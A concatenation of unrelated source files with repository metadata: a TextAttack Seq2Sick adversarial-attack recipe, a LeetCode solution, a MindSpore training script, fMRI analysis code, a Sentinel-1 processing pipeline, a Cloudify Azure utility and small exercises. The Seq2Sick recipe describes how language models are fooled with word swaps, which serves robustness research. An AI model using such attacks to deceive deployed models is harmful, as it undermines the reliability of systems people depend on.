8517ce3f417f877036d4b1f5d9af879c97c0a703 | e02506da0c661c8241fed00efdd0d6b2f8b147df | /textattack/attack_recipes/seq2sick_cheng_2018_blackbox.py | 8af6d15138de6bc314511c851970b1c226990123 | [
"MIT"
] | permissive | SatoshiRobatoFujimoto/TextAttack | 2592a828f128fd8bf0b8ce5578e9488df5b2ac97 | a809a9bddddff9f41750949e26edde26c8af6cfa | refs/heads/master | 2022-07-11T02:10:24.536157 | 2020-05-14T13:29:44 | 2020-05-14T13:29:44 | 263,941,825 | 1 | 0 | MIT | 2020-05-14T14:43:47 | 2020-05-14T14:43:46 | null | UTF-8 | Python | false | false | 1,205 | py | """
Cheng, Minhao, et al.
Seq2Sick: Evaluating the Robustness of Sequence-to-Sequence Models with
Adversarial Examples
ArXiv, abs/1803.01128.
This is a greedy re-implementation of the seq2sick attack method. It does
not use gradient descent.
"""
from textattack.constraints.overlap import LevenshteinEditDistance
from textattack.goal_functions import NonOverlappingOutput
from textattack.search_methods import GreedyWordSwapWIR
from textattack.transformations import WordSwapEmbedding
def Seq2SickCheng2018BlackBox(model, goal_function='non_overlapping'):
#
# Goal is non-overlapping output.
#
goal_function = NonOverlappingOutput(model)
# @TODO implement transformation / search method just like they do in
# seq2sick.
transformation = WordSwapEmbedding(max_candidates=50)
#
# In these experiments, we hold the maximum difference
# on edit distance (ϵ) to a constant 30 for each sample.
#
#
# Greedily swap words with "Word Importance Ranking".
#
attack = GreedyWordSwapWIR(goal_function, transformation=transformation,
constraints=[], max_depth=10)
return attack
| [
"[email protected]"
] | |
f9791b2b58c0ed0961046f7b8a0dd4bb73d8450a | 5410700e83210d003f1ffbdb75499062008df0d6 | /leetcode/tree2Str.py | 61ae648b31c803481fe3db7769a6109de4b7ac74 | [] | no_license | lilyandcy/python3 | 81182c35ab8b61fb86f67f7796e057936adf3ab7 | 11ef4ace7aa1f875491163d036935dd76d8b89e0 | refs/heads/master | 2021-06-14T18:41:42.089534 | 2019-10-22T00:24:30 | 2019-10-22T00:24:30 | 144,527,289 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | class Solution:
def tree2str(self, t):
"""
:type t: TreeNode
:rtype: str
"""
if t == None:
return ""
if t.left == None and t.right == None:
return str(t.val)
elif t.left == None:
return str(t.val) + "()" + "(" + self.tree2str(t.right) + ")"
elif t.right == None:
return str(t.val) + "(" + self.tree2str(t.left) + ")"
else:
return str(t.val) + "(" + self.tree2str(t.left) + ")" + "(" + self.tree2str(t.right) + ")" | [
"[email protected]"
] | |
d3a92669d402c8e28659a759ac1a2d6cc27440b5 | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/MindSpore/Research/cv/image_classification/FaceAttribute_for_MindSpore/train.py | a269bece0a922cf7323ebe7a7e5a57abd9157391 | [
"Apache-2.0"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 8,476 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Face attribute train."""
import os
import time
import datetime
import argparse
import mindspore.nn as nn
from mindspore import context
from mindspore import Tensor
from mindspore.nn.optim import Momentum
from mindspore.communication.management import get_group_size, init, get_rank
from mindspore.nn import TrainOneStepCell
from mindspore.context import ParallelMode
from mindspore.train.callback import ModelCheckpoint, RunContext, _InternalCallbackParam, CheckpointConfig
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.ops import operations as P
from mindspore.common import dtype as mstype
from src.FaceAttribute.resnet18 import get_resnet18
from src.FaceAttribute.loss_factory import get_loss
from src.dataset_train import data_generator
from src.lrsche_factory import warmup_step
from src.logging import get_logger, AverageMeter
from src.config import config
devid = int(os.getenv('DEVICE_ID'))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=True, device_id=devid)
class BuildTrainNetwork(nn.Cell):
def __init__(self, network, criterion):
super(BuildTrainNetwork, self).__init__()
self.network = network
self.criterion = criterion
self.print = P.Print()
def construct(self, input_data, label):
logit0, logit1, logit2 = self.network(input_data)
loss = self.criterion(logit0, logit1, logit2, label)
return loss
def parse_args():
parser = argparse.ArgumentParser('Face Attributes')
parser.add_argument('--mindrecord_path', type=str, default='', help='dataset path, e.g. /home/data.mindrecord')
parser.add_argument('--pretrained', type=str, default='', help='pretrained model to load')
parser.add_argument('--local_rank', type=int, default=0, help='current rank to support distributed')
parser.add_argument('--world_size', type=int, default=8, help='current process number to support distributed')
args, _ = parser.parse_known_args()
return args
def train():
# logger
args = parse_args()
# init distributed
if args.world_size != 1:
init()
args.local_rank = get_rank()
args.world_size = get_group_size()
args.per_batch_size = config.per_batch_size
args.dst_h = config.dst_h
args.dst_w = config.dst_w
args.workers = config.workers
args.attri_num = config.attri_num
args.classes = config.classes
args.backbone = config.backbone
args.loss_scale = config.loss_scale
args.flat_dim = config.flat_dim
args.fc_dim = config.fc_dim
args.lr = config.lr
args.lr_scale = config.lr_scale
args.lr_epochs = config.lr_epochs
args.weight_decay = config.weight_decay
args.momentum = config.momentum
args.max_epoch = config.max_epoch
args.warmup_epochs = config.warmup_epochs
args.log_interval = config.log_interval
args.ckpt_path = config.ckpt_path
if args.world_size == 1:
args.per_batch_size = 256
else:
args.lr = args.lr * 4.
if args.world_size != 1:
parallel_mode = ParallelMode.DATA_PARALLEL
else:
parallel_mode = ParallelMode.STAND_ALONE
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, gradients_mean=True, device_num=args.world_size)
# model and log save path
args.outputs_dir = os.path.join(args.ckpt_path, datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
args.logger = get_logger(args.outputs_dir, args.local_rank)
loss_meter = AverageMeter('loss')
# dataloader
args.logger.info('start create dataloader')
de_dataloader, steps_per_epoch, num_classes = data_generator(args)
args.steps_per_epoch = steps_per_epoch
args.num_classes = num_classes
args.logger.info('end create dataloader')
args.logger.save_args(args)
# backbone and loss
args.logger.important_info('start create network')
create_network_start = time.time()
network = get_resnet18(args)
criterion = get_loss()
# load pretrain model
if os.path.isfile(args.pretrained):
param_dict = load_checkpoint(args.pretrained)
param_dict_new = {}
for key, values in param_dict.items():
if key.startswith('moments.'):
continue
elif key.startswith('network.'):
param_dict_new[key[8:]] = values
else:
param_dict_new[key] = values
load_param_into_net(network, param_dict_new)
args.logger.info('load model {} success'.format(args.pretrained))
# optimizer and lr scheduler
lr = warmup_step(args, gamma=0.1)
opt = Momentum(params=network.trainable_params(),
learning_rate=lr,
momentum=args.momentum,
weight_decay=args.weight_decay,
loss_scale=args.loss_scale)
train_net = BuildTrainNetwork(network, criterion)
# mixed precision training
criterion.add_flags_recursive(fp32=True)
# package training process
train_net = TrainOneStepCell(train_net, opt, sens=args.loss_scale)
context.reset_auto_parallel_context()
# checkpoint
if args.local_rank == 0:
ckpt_max_num = args.max_epoch
train_config = CheckpointConfig(save_checkpoint_steps=args.steps_per_epoch, keep_checkpoint_max=ckpt_max_num)
ckpt_cb = ModelCheckpoint(config=train_config, directory=args.outputs_dir, prefix='{}'.format(args.local_rank))
cb_params = _InternalCallbackParam()
cb_params.train_network = train_net
cb_params.epoch_num = ckpt_max_num
cb_params.cur_epoch_num = 0
run_context = RunContext(cb_params)
ckpt_cb.begin(run_context)
train_net.set_train()
t_end = time.time()
t_epoch = time.time()
old_progress = -1
i = 0
for step_i, (data, gt_classes) in enumerate(de_dataloader):
data_tensor = Tensor(data, dtype=mstype.float32)
gt_tensor = Tensor(gt_classes, dtype=mstype.int32)
loss = train_net(data_tensor, gt_tensor)
loss_meter.update(loss.asnumpy()[0])
# save ckpt
if args.local_rank == 0:
cb_params.cur_step_num = i + 1
cb_params.batch_num = i + 2
ckpt_cb.step_end(run_context)
if i % args.steps_per_epoch == 0 and args.local_rank == 0:
cb_params.cur_epoch_num += 1
# save Log
if i == 0:
time_for_graph_compile = time.time() - create_network_start
args.logger.important_info('{}, graph compile time={:.2f}s'.format(args.backbone, time_for_graph_compile))
if i % args.log_interval == 0 and args.local_rank == 0:
time_used = time.time() - t_end
epoch = int(i / args.steps_per_epoch)
fps = args.per_batch_size * (i - old_progress) * args.world_size / time_used
args.logger.info('epoch[{}], iter[{}], {}, {:.2f} imgs/sec'.format(epoch, i, loss_meter, fps))
t_end = time.time()
loss_meter.reset()
old_progress = i
if i % args.steps_per_epoch == 0 and args.local_rank == 0:
epoch_time_used = time.time() - t_epoch
epoch = int(i / args.steps_per_epoch)
fps = args.per_batch_size * args.world_size * args.steps_per_epoch / epoch_time_used
args.logger.info('=================================================')
args.logger.info('epoch time: epoch[{}], iter[{}], {:.2f} imgs/sec'.format(epoch, i, fps))
args.logger.info('=================================================')
t_epoch = time.time()
i += 1
args.logger.info('--------- trains out ---------')
if __name__ == "__main__":
train()
| [
"[email protected]"
] | |
7cc2c7507b75fcd535a7e8e9c9b0457f48bd6414 | e0b6f5bd451aa8af3273fbc948799637681342e1 | /scripts/wm_representation/functions/IEM/Controls/trial_by_trial/trainT_testT_wm3_shuffles_refs.py | 99a1066c8955feb220ec3514ad753bea566ad476 | [] | no_license | davidbestue/encoding | 6b304f6e7429f94f97bd562c7544d1fdccf7bdc1 | c27319aa3bb652b3bfc6b7340044c0fda057bc62 | refs/heads/master | 2022-05-05T23:41:42.419252 | 2022-04-27T08:34:52 | 2022-04-27T08:34:52 | 144,248,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,890 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 18:24:32 2019
@author: David Bestue
"""
#######
####### In this analysis:
####### I am doing the reconstruction training in the delay period and testing in each trial. No CV and No Shuffles
#######
############# Add to sys path the path where the tools folder is
import sys, os
#path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir)) ### same directory or one back options
path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir, os.pardir)) ### same directory or one back options
sys.path.insert(1, path_tools)
from tools import *
############# Namefiles for the savings.
path_save_reconst_shuffs ='/home/david/Desktop/Reconstructions/IEM/recs_shuffs_references_IEM_trainT_testT_wm3.npy'
############# Testing options
decoding_thing = 'T_alone' #'dist_alone' 'T_alone'
############# Training options
training_item = 'T_alone' #'dist_alone' 'T_alone'
cond_t = '1_7' #'1_7' '2_7'
Distance_to_use = 'mix' #'close' 'far'
training_time= 'delay' #'stim_p' 'delay' 'respo'
tr_st=4
tr_end=6
############# Elements for the loop
Conditions=['1_0.2', '1_7', '2_0.2', '2_7']
Subjects=['d001', 'n001', 'b001', 'r001', 's001', 'l001']
brain_regions = ['visual','ips', 'pfc', 'broca']
ref_angle=180
Reconstructions_ = [] ## subjects x brain regiond --> ntrials x 16 x 720 matrix
############# Analysis
#############
for Subject in Subjects:
for Brain_region in brain_regions:
enc_fmri_paths, enc_beh_paths, wm_fmri_paths, wm_beh_paths, masks = data_to_use( Subject, 'together', Brain_region)
activity, behaviour = process_wm_task(wm_fmri_paths, masks, wm_beh_paths, nscans_wm=nscans_wm)
behaviour['Condition'] = behaviour['Condition'].replace(['1.0_0.2', '1.0_7.0', '2.0_0.2','2.0_7.0' ], ['1_0.2', '1_7', '2_0.2', '2_7'])
behaviour['brain_region'] = Brain_region
###
###
print(Subject, Brain_region)
Reconstructed_trials=[] ## ntrials x 16 x 720 matrix
###
###
#angx = behaviour[decoding_thing].values
#angles_shuffled = random.sample( list(angx), len(angx) )
###
###
for trial in range(len(behaviour)):
activity_trial = activity[trial,:,:]
beh_trial = behaviour.iloc[trial,:]
session_trial = beh_trial.session_run
###
### Training
###
if cond_t == '1_7':
boolean_trials_training = np.array(behaviour['delay1']==7) * np.array(behaviour['order']==1) * np.array(behaviour['session_run']!=session_trial)
elif cond_t == '2_7':
boolean_trials_training = np.array(behaviour['delay1']==7) * np.array(behaviour['order']==2) * np.array(behaviour['session_run']!=session_trial)
#
activity_train_model = activity[boolean_trials_training, :, :]
activity_train_model_TRs = np.mean(activity_train_model[:, tr_st:tr_end, :], axis=1)
behavior_train_model = behaviour[boolean_trials_training]
training_angles = behavior_train_model[['T', 'NT1', 'NT2']].values
#
Weights_matrix, Interc = Weights_matrix_LM_3items(activity_train_model_TRs, training_angles)
Weights_matrix_t = Weights_matrix.transpose()
###
### Testing
###
Reconstructed_TR = [] ## 16 x 720 matrix
#
for TR_ in range(nscans_wm):
activity_TR = activity_trial[TR_, :]
angle_trial = random.choice([0,90,180,270])
Inverted_encoding_model = np.dot( np.dot ( np.linalg.pinv( np.dot(Weights_matrix_t, Weights_matrix ) ), Weights_matrix_t), activity_TR)
#Inverted_encoding_model_pos = Pos_IEM2(Inverted_encoding_model)
IEM_hd = ch2vrep3(Inverted_encoding_model) #36 to 720
to_roll = int( (ref_angle - angle_trial)*(len(IEM_hd)/360) ) ## degrees to roll
IEM_hd_aligned=np.roll(IEM_hd, to_roll) ## roll this degree ##vector of 720
Reconstructed_TR.append(IEM_hd_aligned)
##
resconstr_trial = np.array(Reconstructed_TR)
Reconstructed_trials.append(resconstr_trial)
##
##
Reconstructions_.append(Reconstructed_trials)
########
final_rec = np.array(Reconstructions_)
np.save(path_save_reconst_shuffs, final_rec)
############# Options de training times, the TRs used for the training will be different
# training_time=='delay':
# tr_st=4
# tr_end=6
# training_time=='stim_p':
# tr_st=3
# tr_end=4
# training_time=='delay':
# tr_st=4
# tr_end=6
# training_time=='respo':
# if decoding_thing=='Target':
# tr_st=8
# tr_end=9
# elif decoding_thing=='Distractor':
# tr_st=11
# tr_end=12 | [
"[email protected]"
] | |
98fa4703bd418ed584d3c0b4069f185a536db5ec | 87e7f159b48ad4e2b784c8846bed37e1825fb375 | /gamma/grd_batch_process.py | 2438f8c31f8555e79c2e0e4fb469c0d34b7b1584 | [] | no_license | whigg/GeorgeVI-surface-melt | 0db560640209911d5ef432ebf1fdef49b1f9957a | 0778de50fa747a4165273c9ef9edd65bf783fd34 | refs/heads/master | 2023-07-10T22:14:57.455070 | 2020-05-28T12:20:57 | 2020-05-28T12:20:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,982 | py | #activate the gamma environment in the shell
#gma
#geoutils
import os
import os.path
from os import path
import subprocess
from pyroSAR import identify
#import faulthandler; faulthandler.enable()
dem = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/DEM/REMA_resampled_10m.dem"
dem_par = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/DEM/REMA_resampled_10m.dem_par"
outdir = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/s1_grd_processed/grd_processed"
rootdir = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/'
study_area = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/study_area/study_area_square.shp'
surplus_files = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/s1_grd_processed/to_be_deleted/'
def unzip():
'''Unzips S1.zip files into .SAFE folders.'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".zip"):
filename = str(dirname)[:-4]
#unzip S1 data to .SAFE file
if not path.exists(f"{rootdir}{filename}.SAFE"):
unzip = f"unzip {rootdir}{dirname} -d {rootdir}"
os.system(unzip)
print(f"{dirname} is now unzipped.")
def mk_POEORB_dir():
'''creates the file structure needed for the orbit files.
Make sure the correct orbit file is downloaded and placed inside the
POEORB directory before running the processGRD() function. '''
for dirname in os.listdir(rootdir):
if dirname.endswith(".SAFE"):
if not path.exists(f"{rootdir}{dirname}/osv/"):
os.makedirs(f"{rootdir}{dirname}/osv/")
print("Directories for orbit files created.")
def downloadOSV():
'''downloads the OSV file associated with each S1 image and places it into the correct file structure'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".zip"):
filename = str(dirname)[:-4]
if path.exists(f"{rootdir}{filename}.SAFE/osv/"):
scene = f"{rootdir}{dirname}"
platform = str(dirname)[:3]
year = str(dirname)[17:21]
month = str(dirname)[21:23]
day = str(dirname)[23:25]
id = identify(scene)
id.getOSV(osvdir=f'{rootdir}{filename}.SAFE/osv/', osvType='POE') #downloads OSV file as a zip file located in {rootdir}/POEORB/S1B/2019/05/
if day != "01":
unzip = f"unzip {rootdir}{filename}.SAFE/osv/POEORB/{platform}/{year}/{month}/*.zip -d {rootdir}{filename}.SAFE/osv/POEORB"
else:
pre_month = int(month)-1
if pre_month > 9:
orb_month = str(pre_month)
else:
orb_month = '0'+ str(pre_month)
unzip = f"unzip {rootdir}{filename}.SAFE/osv/POEORB/{platform}/{year}/{orb_month}/*.zip -d {rootdir}{filename}.SAFE/osv/POEORB"
os.system(unzip)
else:
print(f"Correct file structure for OSV files does not exist: {dirname}.")
def processGRD():
'''Processes the Sentinel 1 data using the Gamma workflow'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".SAFE"):
#set directory and file names
dir = f'{rootdir}{dirname}'
if path.exists(f"{dir}/osv/POEORB/"):
filename= str(dirname).lower().replace("_", "-")[:-10]
filenameHH = filename.replace("1ssh","hh").replace("grdh","grd")
#Generate MLI and GRD images and parameter files from a Sentinel-1 GRD product
par_command= f"par_S1_GRD {dir}/measurement/{filenameHH}-001.tiff {dir}/annotation/{filenameHH}-001.xml {dir}/annotation/calibration/calibration-{filenameHH}-001.xml - {dir}/{filenameHH}_HH_grd.par {dir}/{filenameHH}_HH_grd - - - - -"
os.system(par_command)
# correct orb files must be allocated beforehand in SAFE folder (/osv/POEORB)
for file in os.listdir(f'{dir}/osv/POEORB/'):
if file.endswith("EOF"):
orb = str(file)
#Extract Sentinel-1 OPOD state vectors and copy into the ISP image parameter file
opod = f"S1_OPOD_vec {dir}/{filenameHH}_HH_grd.par {dir}/osv/POEORB/{orb} -"
os.system(opod)
#Multi-looking of intensity (MLI) images
multilook = f"multi_look_MLI {dir}/{filenameHH}_HH_grd {dir}/{filenameHH}_HH_grd.par {dir}/{filenameHH}_HH_grd_mli {dir}/{filenameHH}_HH_grd_mli.par 2 2 - - -"
os.system(multilook)
#Calculate terrain-geocoding lookup table and DEM derived data products
gc_map = f"gc_map {dir}/{filenameHH}_HH_grd_mli.par - {dem_par} {dem} {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_dem_seg_geo {dir}/{filename}_lut_init 1.0 1.0 - - - {dir}/{filename}_inc_geo - {dir}/{filename}_pix_geo {dir}/{filename}_ls_map_geo 8 2 -"
os.system(gc_map)
#Calculate terrain-based sigma0 and gammma0 normalization area in slant-range geometry
pixel_area = f"pixel_area {dir}/{filenameHH}_HH_grd_mli.par {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_dem_seg_geo {dir}/{filename}_lut_init {dir}/{filename}_ls_map_geo {dir}/{filename}_inc_geo - - - - {dir}/{filename}_pix_fine -"
os.system(pixel_area)
#Calculate product of two images: (image 1)*(image 2)
mli_samples = subprocess.check_output(f"grep samples {dir}/{filenameHH}_HH_grd_mli.par", shell=True)
mli_samples = str(mli_samples).replace("\n'","").split(' ')[-1][:-3]
print("MLI Samples:", mli_samples)
product = f"product {dir}/{filenameHH}_HH_grd_mli {dir}/{filename}_pix_fine {dir}/{filenameHH}_HH_grd_mli_pan {mli_samples} 1 1 -"
os.system(product)
#Geocoding of image data using a geocoding lookup table
dem_samples = subprocess.check_output(f"grep width {dir}/{filename}_dem_seg_geo.par", shell=True)
dem_samples = str(dem_samples).replace("\n'","").split(' ')[-1][:-3]
print("DEM Samples:", dem_samples)
geocode_back = f"geocode_back {dir}/{filenameHH}_HH_grd_mli_pan {mli_samples} {dir}/{filename}_lut_init {dir}/{filenameHH}_HH_grd_mli_pan_geo {dem_samples} - 2 - - - -"
os.system(geocode_back)
#Compute backscatter coefficient gamma (sigma0)/cos(inc)
sigma2gamma = f"sigma2gamma {dir}/{filenameHH}_HH_grd_mli_pan_geo {dir}/{filename}_inc_geo {dir}/{filenameHH}_HH_grd_mli_norm_geo {dem_samples}"
os.system(sigma2gamma)
#Conversion of data between linear and dB scale
linear_to_dB = f"linear_to_dB {dir}/{filenameHH}_HH_grd_mli_norm_geo {dir}/{filenameHH}_HH_grd_mli_norm_geo_db {dem_samples} 0 -99"
os.system(linear_to_dB)
#convert geocoded data with DEM parameter file to GeoTIFF format (dB)
data2geotiff = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filenameHH}_HH_grd_mli_norm_geo_db 2 {outdir}/{filenameHH}_HH_grd_mli_norm_geo_db.tif -99"
os.system(data2geotiff)
#Produce different types of geotiffs (unhash lines below if want to create them)
#data2geotiff2 = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_inc_geo 2 {outdir}/{filename}_inc_geo.tif -99"
#os.system(data2geotiff2)
#data2geotiff3 = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_ls_map_geo 5 {outdir}/{filename}_ls_map_geo.tif 0"
#os.system(data2geotiff3)
print("I finished the scene")
else:
print(f"OSV files have not been downloaded: {dirname}.")
def transform_geotiff(): #Tested and works
'''Transforms geotiff into the UTM 19S projection (EPSG: 32719)'''
for geotiff in os.listdir(outdir):
if geotiff.endswith("db.tif"):
filename= str(geotiff)[:-4]
transform = f"gdalwarp -t_srs EPSG:32719 {outdir}/{filename}.tif {outdir}/{filename}_utm_19S.tif"
os.system(transform)
#gdal.Warp()
print(f"{geotiff} transformed to EPSG 32719.")
def crop_geotiff(): #Tested and works
'''Crops transformed geotiff to the study area boundary'''
for geotiff in os.listdir(outdir):
if geotiff.endswith("_utm_19S.tif"):
filename = str(geotiff)[:-4]
print(filename)
crop = f"gdalwarp -cutline {study_area} -crop_to_cutline {outdir}/{filename}.tif {outdir}/{filename}_cropped.tif"
os.system(crop)
print(f"{geotiff} cropped to study area.")
def move_surplus_files(): #Tested and works (also need to work on it so it deletes per S1 scene, rather than the whole folder, to ensure safety.)
'''Moves surplus files to other folder, from which they can then be deleted where necessary.
Should only run once the previous steps have been run on all of the geotiffs in the folder.'''
if any(File.endswith("_utm_19S_cropped.tif") for File in os.listdir(outdir)):
for geotiff in os.listdir(outdir):
if geotiff.endswith("geo_db.tif") or geotiff.endswith("_utm_19S.tif") or geotiff.endswith("geo.tif") or geotiff.endswith(".tif.ovr"):
os.rename(f"{outdir}/{geotiff}", f"{surplus_files}{geotiff}")
print(f"{geotiff} has been moved to the to_be_deleted folder.")
elif geotiff.endswith("_utm_19S_cropped.tif"):
print(f"{geotiff} is the final product (transformed and cropped).")
else:
print("The geotiff is yet to be cropped to the study area. Complete this step first, before removing the file from this folder.")
elif any(File.endswith("_utm_19S.tif") for File in os.listdir(outdir)):
for geotiff in os.listdir(outdir):
if geotiff.endswith("geo_db.tif"):
os.rename(f"{outdir}/{geotiff}", f"{surplus_files}{geotiff}")
#os.remove(geotiff)
elif geotiff.endswith("_utm_19S_cropped.tif"):
print(f"{geotiff} is the final product (transformed and cropped).")
else:
print(f"{geotiff} is yet to be transformed into UTM Zone 19S. Complete this step first, before removing the file from this folder.")
else:
print("No surplus files exist in this directory.")
'''Run the functions. Hash them out where necessary.'''
#data preparation steps
unzip()
mk_POEORB_dir()
downloadOSV()
#data processing steps, transformation, crop, and move surplus files
processGRD()
transform_geotiff()
crop_geotiff()
move_surplus_files()
| [
"[email protected]"
] | |
4f714d6172a078dceda6b04a5faec6a75aeec621 | dc63e528012fb2f3e15b73e05c924236760d01b1 | /cloudify_azure/resources/compute/virtualmachine/virtualmachine_utils.py | 4a67d65a4df9ff6e52f6dd881668444d4f9e6848 | [
"Apache-2.0"
] | permissive | cloudify-cosmo/cloudify-azure-plugin | 515b6285b63c2a01ae4d666957541a1f08472410 | 361c48bc4abe38cf57354e8d36839137462ad345 | refs/heads/master | 2023-08-21T14:23:06.673284 | 2023-07-30T10:44:39 | 2023-07-30T10:44:39 | 36,666,947 | 4 | 14 | Apache-2.0 | 2023-07-30T10:44:41 | 2015-06-01T14:42:32 | Python | UTF-8 | Python | false | false | 3,521 | py | # #######
# Copyright (c) 2016-2020 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudify import ctx
def check_if_configuration_changed(ctx, update_payload, current_vm):
for prop in ['location', 'tags', 'plan', 'availability_set',
'eviction_policy', 'billing_profile', 'priority',
'hardware_profile']:
update_property_value = update_payload.get(prop)
current_vm_property_value = current_vm.get(prop)
if update_property_value and ordered(
update_property_value) != ordered(current_vm_property_value):
ctx.logger.info("{prop} changed.".format(prop=prop))
ctx.logger.info("update payload: {content}.".format(
content=update_property_value))
ctx.logger.info("current configuration: {content}.".format(
content=current_vm_property_value))
return True
for prop in ['os_profile', 'storage_profile', 'network_profile']:
if prop == 'network_profile' and update_payload.get(prop):
update_property_value = update_payload.get(prop).as_dict()
else:
update_property_value = update_payload.get(prop, {})
current_vm_property_value = current_vm.get(prop, {})
if diff_dictionaries(update_property_value, current_vm_property_value):
ctx.logger.info("{prop} changed.".format(prop=prop))
return True
return False
def diff_dictionaries(update_dict, current_conf_dict):
"""
Returns True if update_dict has changes in a key that doesn't appear in
current_conf_dict.
current_conf_dict can have additional keys and its not considered as a
diff.
"""
for key in update_dict:
if isinstance(update_dict.get(key), dict):
res = diff_dictionaries(update_dict.get(key),
current_conf_dict.get(key, {}))
if res:
return True
elif ordered(update_dict.get(key)) != ordered(
current_conf_dict.get(key)):
ctx.logger.info(
'Changes found in diff_dictionaries: key={key}\n'.format(
key=key))
ctx.logger.info(
'update_dict: {}'.format(ordered(update_dict.get(key))))
ctx.logger.info(
'current_conf_dict: {}'.format(ordered(
current_conf_dict.get(key))))
return True
return False
def ordered(obj):
"""
This function will recursively sort any lists it finds
(and convert dictionaries to lists of (key, value) pairs so that they're
orderable)
"""
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
if isinstance(obj, str):
return obj.lower()
if isinstance(obj, (int, float)):
return str(obj)
else:
return obj
| [
"[email protected]"
] | |
8eb20a63cf9ae7debe25c9b008d788862e5ee7da | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/78/usersdata/171/41777/submittedfiles/divisores.py | 701949f8b9cb8bf36079078eda939d27b7fe7166 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | # -*- coding: utf-8 -*-
import math
n=int(input('digite n:'))
a=int(input('digite a:'))
b=int(input('digite b:'))
d=a
e=b
f=a*b
for i in range(1,n+1,1):
d=a
e=b
f=a*b
print(f) | [
"[email protected]"
] | |
ecf2e202398d9c58d9d5bcb9846dbebaf58a02aa | 0ccab2965458454d6a4802b47d33310e43c10d8f | /classes/student.py | c9e7d33683deae9b858dc5fb04d7034fd00d39ca | [] | no_license | jazib-mahmood-attainu/Ambedkar_Batch | 11e66125647b3b348d4567862f8fc20a3457b2f0 | c99be9a401b8d00f6ca47398f48e90ead98f4898 | refs/heads/main | 2023-08-01T13:13:43.357769 | 2021-09-25T03:54:27 | 2021-09-25T03:54:27 | 390,405,238 | 16 | 10 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Student:
def __init__(self,roll,name,age):
self.roll = roll
self.name = name
self.age = age
def reads(self):
print(self.name,"is reading")
preeti = Student(10,"Preeti",24)
print(preeti.name)
print(preeti.roll)
print(preeti.age)
preeti.reads()
print("**********")
sapna = Student(11,"Sapna",19)
print(sapna.name)
print(sapna.roll)
print(sapna.age)
sapna.reads()
| [
"[email protected]"
] | |
e2230aed752c8a73948aecc725580d22f370446b | 1e9fed88ce4a623970f7e53143753a170d4bdcda | /aat/tests/test_strategy.py | 37e4f8123735a0e70663ec060bc26eda308854e1 | [
"Apache-2.0"
] | permissive | krusty45/aat | 06dedbfe0abaf76c4a584ad441dc7badd093a939 | a14b652f7ff90761d0e1198a85d8fc02efeff0eb | refs/heads/master | 2020-06-24T09:34:30.981326 | 2019-07-09T19:34:22 | 2019-07-09T19:34:22 | 198,929,483 | 1 | 0 | Apache-2.0 | 2019-07-26T02:07:57 | 2019-07-26T02:07:56 | null | UTF-8 | Python | false | false | 453 | py | # for coverage
from ..strategy import *
class TestStrategy:
def setup(self):
pass
# setup() before each test method
def teardown(self):
pass
# teardown() after each test method
@classmethod
def setup_class(cls):
pass
# setup_class() before any methods in this class
@classmethod
def teardown_class(cls):
pass
# teardown_class() after any methods in this class
| [
"[email protected]"
] | |
